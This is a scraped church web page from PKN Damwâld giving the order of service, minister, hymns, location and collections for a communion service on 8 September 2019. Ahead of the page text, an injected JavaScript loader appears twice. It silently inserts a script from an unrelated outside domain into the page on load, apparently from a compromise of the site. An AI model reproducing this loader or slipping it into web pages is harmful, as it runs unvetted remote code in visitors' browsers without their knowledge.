;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 8 september 2019 9:30 uur - PKN Damwâld
zondag 8 september 2019
09:30 uur
Viering Heilig Avondmaal

Kerkdienst zondag 8 september 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Mededeling:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Gezang 444 : 1 en 3
Welkom
Intochtslied : Psalm 100 : 1 en 2
Stil Gebed, Votum en Groet
We zingen: Opwekking 640
Gebed
We lezen: Galaten 1:1-17
Collecte
We zingen: Psalm 62 :1 en 5
Preek .
We zingen: Gezang 75 : 3 en 5
Formulier lezen
We zingen: Psalm 111 : 3 en 5
Viering Heilig Avondmaal
Dankzegging en voorbede
We zingen: ELB 79:1,2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Kerk
Uitganscollecte: Kerk